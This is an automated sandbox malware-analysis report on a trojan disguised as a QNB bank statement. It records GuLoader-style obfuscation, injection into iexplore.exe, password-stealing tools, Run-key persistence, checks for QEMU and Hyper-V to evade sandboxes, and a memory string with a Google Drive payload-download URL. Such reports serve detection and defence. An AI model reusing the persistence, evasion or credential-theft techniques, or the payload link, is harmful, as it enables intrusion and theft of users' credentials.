Source: Statement from QNB.exe, 00000000.00000000.80618851300.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp Binary or memory string: OriginalFilename1.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX vs Statement from QNB.exe
Source: Statement from QNB.exe, 00000004.00000000.80785394197.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Source: Statement from QNB.exe Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll
Source: Statement from QNB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Statement from QNB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt"
Source: unknown Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 14_2_00410DE1
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe System information queried: HandleInformation
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4
Source: C:\Users\user\Desktop\Statement from QNB.exe File created: C:\Users\user\AppData\Local\Temp\~DFB9E9D901A47CB813.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/16@5/4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00416857 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 17_2_00416857
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004163CD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 17_2_004163CD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00411A64 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle, 17_2_00411A64
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource, 14_2_0041208B
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.81471342102.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.80790209471.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.81650689390.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.81386820299.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.81293484753.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.81498277835.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.81577027857.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.81384924963.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.81467189265.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0040BE02 push cs; ret 0_2_0040BE0F
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_00401194 push esi; iretd 0_2_00401195
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_004063A0 push edi; iretd 0_2_004063A1
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F208A push edi; ret 0_2_022F20B9
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F3C8F pushfd ; retf 0_2_022F3C96
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F21DE push 81EB8925h; ret 0_2_022F21E3
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087510B pushfd ; ret 4_3_0087510C
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE208A push edi; ret 15_2_02BE20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE3C8F pushfd ; retf 15_2_02BE3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE21DE push 81EB8925h; ret 15_2_02BE21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B208A push edi; ret 21_2_006B20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B3C8F pushfd ; retf 21_2_006B3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B21DE push 81EB8925h; ret 21_2_006B21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE208A push edi; ret 22_2_02CE20B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE3C8F pushfd ; retf 22_2_02CE3C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE21DE push 81EB8925h; ret 22_2_02CE21E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056208A push edi; ret 23_2_005620B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00563C8F pushfd ; retf 23_2_00563C96
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005621DE push 81EB8925h; ret 23_2_005621E3
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9CAC7 push FFFFFFDBh; iretd 25_3_00A9CAD8
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00404C9D LoadLibraryA,GetProcAddress, 14_2_00404C9D

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4
Creates autostart registry keys with suspicious names
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 16_2_0040F64B
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Statement from QNB.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: ILES\QEMU-GA\QEMU-GA.EXE
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmp Binary or memory string: \QEMU-GA\QEMU-GA.EXE]
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: \QEMU-GA.EXE
Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1YZH40PNS32XIEWW_X1KB4GXHZIPD-FNP
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230377C rdtsc 0_2_0230377C
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Statement from QNB.exe Window / User API: threadDelayed 9995
Source: C:\Users\user\Desktop\Statement from QNB.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00416A80 memset,GetSystemInfo, 17_2_00416A80
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00406EC3
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen, 17_2_00408752
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose, 17_2_004080D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040423A FindFirstFileA,FindNextFileA, 18_2_0040423A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen, 20_2_0040537B
Source: C:\Users\user\Desktop\Statement from QNB.exe System information queried: ModuleInformation
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0O
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
